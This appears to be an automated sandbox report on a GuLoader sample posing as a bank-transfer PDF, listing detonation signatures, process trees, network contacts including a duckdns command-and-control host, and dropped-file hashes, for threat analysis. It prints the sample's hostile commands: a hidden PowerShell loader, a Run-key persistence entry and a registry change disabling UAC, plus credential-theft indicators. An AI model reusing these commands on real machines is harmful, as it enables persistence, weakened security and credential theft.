Malware Analysis Report

2024-10-18 23:07

Sample ID 240710-kkm91axfnp
Target pko_trans_details_20240710_105339·pdf.exe
SHA256 d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c
Tags
guloader collection downloader evasion execution persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c

Threat Level: Known bad

The file pko_trans_details_20240710_105339·pdf.exe was found to be: Known bad.

Malicious Activity Summary

guloader collection downloader evasion execution persistence trojan

Guloader,Cloudeye

UAC bypass

NirSoft MailPassView

Nirsoft

NirSoft WebBrowserPassView

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Accesses Microsoft Outlook accounts

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Program crash

Enumerates physical storage devices

Unsigned PE

NSIS installer

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-10 08:39

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win7-20240704-en

Max time kernel

14s

Max time network

19s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win10v2004-20240709-en

Max time kernel

93s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4924 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4924 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4924 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3416 -ip 3416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 644

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win7-20240704-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1884 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1884 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1884 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1884 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1884 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1884 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1884 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1884 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2284 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1072 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\djnamyferjtolmmslutqajl"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fltsnrpyfrlbvbawufgrkogwrg"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 a458386d9.duckdns.org udp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp

Files

\Users\Admin\AppData\Local\Temp\nso47AB.tmp\nsDialogs.dll

MD5 1c8b2b40c642e8b5a5b3ff102796fb37
SHA1 3245f55afac50f775eb53fd6d14abb7fe523393d
SHA256 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c
SHA512 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57

\Users\Admin\AppData\Local\Temp\nso47AB.tmp\BgImage.dll

MD5 521df745a41f0b8164ffd01717cacbba
SHA1 dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74
SHA256 dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b
SHA512 c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe

\Users\Admin\AppData\Local\Temp\nso47AB.tmp\UserInfo.dll

MD5 acbda33dd5700c122e2fe48e3d4351fd
SHA1 2c154baf7c64052ee712b7cdf9c36b7697dd3fc8
SHA256 943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0
SHA512 d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd

memory/2284-30-0x00000000737B1000-0x00000000737B2000-memory.dmp

memory/2284-32-0x00000000737B0000-0x0000000073D5B000-memory.dmp

memory/2284-33-0x00000000737B0000-0x0000000073D5B000-memory.dmp

memory/2284-31-0x00000000737B0000-0x0000000073D5B000-memory.dmp

memory/2284-34-0x00000000737B0000-0x0000000073D5B000-memory.dmp

C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San

MD5 bf1ebfd1285dd7ef43a587e9f51a8e33
SHA1 1dede4026611e9f40c91d9bbe406a06b2fd8bfa4
SHA256 de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff
SHA512 3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389

memory/2284-37-0x00000000737B0000-0x0000000073D5B000-memory.dmp

memory/2284-38-0x00000000737B0000-0x0000000073D5B000-memory.dmp

C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non

MD5 afc1982fff88592a55312010cfc773c6
SHA1 c57e918c5149ca9c2a331a78ecef84ffc667feb7
SHA256 02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0
SHA512 f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e

memory/2284-40-0x00000000737B0000-0x0000000073D5B000-memory.dmp

memory/2284-41-0x00000000737B0000-0x0000000073D5B000-memory.dmp

memory/2284-43-0x00000000062B0000-0x000000000AE6C000-memory.dmp

memory/2284-65-0x00000000062B0000-0x000000000AE6C000-memory.dmp

memory/1776-73-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2336-75-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2336-76-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2216-80-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2216-83-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1776-82-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2336-81-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1776-78-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2336-77-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1776-74-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2216-84-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\ProgramData\remcos\logs.dat

MD5 e607cf77e798eb275450c3cda5efeb1c
SHA1 0b3602942f3d9ad7e1f1ef979ebe589dbc8a8862
SHA256 9751f67592c212d9ec4b500087a13140f1feb12af149c0ccbbed240328d71011
SHA512 59e4cb59341bca7c436eac0e6e471e52dea263d829fc9c498cd9eabdc6808b6f15931b8a6068e32cfc170ea39ddf4f3bdb300ef937f5aedbb419ea5ee77dd411

memory/2284-91-0x0000000010000000-0x0000000010019000-memory.dmp

memory/2284-95-0x0000000010000000-0x0000000010019000-memory.dmp

memory/2284-94-0x0000000010000000-0x0000000010019000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win10v2004-20240709-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 2688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3220 wrote to memory of 2688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3220 wrote to memory of 2688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2688 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2688 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3220 wrote to memory of 1956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3220 wrote to memory of 1956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3220 wrote to memory of 1956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1956 wrote to memory of 732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1956 wrote to memory of 732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1956 wrote to memory of 732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3220 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 1760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 1760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 1760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 1760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 3700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 3700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 3700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 3700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

